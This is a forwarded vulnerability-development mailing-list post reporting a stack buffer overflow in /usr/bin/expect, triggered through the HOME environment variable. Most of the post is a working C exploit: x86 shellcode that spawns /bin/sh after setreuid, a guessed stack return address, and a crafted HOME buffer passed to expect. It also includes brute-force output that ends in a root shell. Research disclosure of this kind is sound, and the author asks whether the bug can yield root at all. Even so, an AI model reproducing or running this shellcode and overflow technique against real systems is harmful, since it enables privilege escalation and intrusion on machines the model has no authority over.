Vulnerability Development: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]

[KF <dotslash () snosoft com>]

I have found an overflow in and coded the exploit code for several
versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
unable to think of a situation where this would be useful due to the
fact that expect is not suid...can anyone help me determine if this is
exploitable to obtain root? Perhaps a suid expect script could be
exploited? or maybe something like suid kppp which calls expect as a
helper program?

[root () linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
[root () linux elguapo]# expect
Segmentation fault (core dumped)

-Kevin Finisterre
dotslash () snosoft com
--------------54785D81E19EEAA4D65A5A40
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii;
 name="expect.c"
Content-Disposition: inline;
 filename="expect.c"

//krfinisterre () checkfree com or dotslash () snosoft com
//this is output from my brute script...
//722
//Stack pointer: 0xbffffa18
//       Offset: 0x2d3
//  Return addr: 0xbffff745
//stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
$3
$L
//723
//Stack pointer: 0xbffffa18
//       Offset: 0x2d4
//  Return addr: 0xbffff744
//sh-2.04#
//note that I was root when I ran this ... expect is not suid

#define BUFFERSIZE 533

unsigned long sp(void)
{
        __asm__("movl %esp, %eax");
}

int main(int argc,char **argv)
{
  char hell[] =
        "\x29\xc0"
        "\x29\xc0"
        "\xb0\x47"
        "\x29\xdb"
        "\xb3\x0c"
        "\x89\xd9"
        "\xcd\x80"
        "\x5e"
        "\x29\xc0"
        "\x88\x46\x07"
        "\x89\x46\x0c"
        "\x89\x76\x08"
        "\xb0\x0b"
        "\x87\xf3"
        "\x8d\x4b\x08"
        "\x8d\x53\x0c"
        "\xcd\x80"
        "\xe8\xe3\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";
        int i;
        int offset;
        long esp;
        long ret;
        long *addr_ptr;
        char *buffer, *ptr;
        offset = atoi(argv[1]);
        esp = sp();
        ret = esp-offset;

        if(!(buffer = malloc(BUFFERSIZE)))
        {
                printf("oops\n");
                exit(-1);
        }

        ptr = buffer;
        addr_ptr = (long *)ptr;
        for (i=0; i<BUFFERSIZE; i+=4)
                *(addr_ptr++) = ret;

        for (i=0; i<BUFFERSIZE/2; i++)
                buffer[i] = '\xeb02';

        ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
        for(i=0; i<strlen(hell); i++)
                *(ptr++) = hell[i];

        buffer[BUFFERSIZE-1] = 0;

        setenv("HOME", buffer, 1);
        execlp("/usr/bin/expect", 0);
}

--------------54785D81E19EEAA4D65A5A40--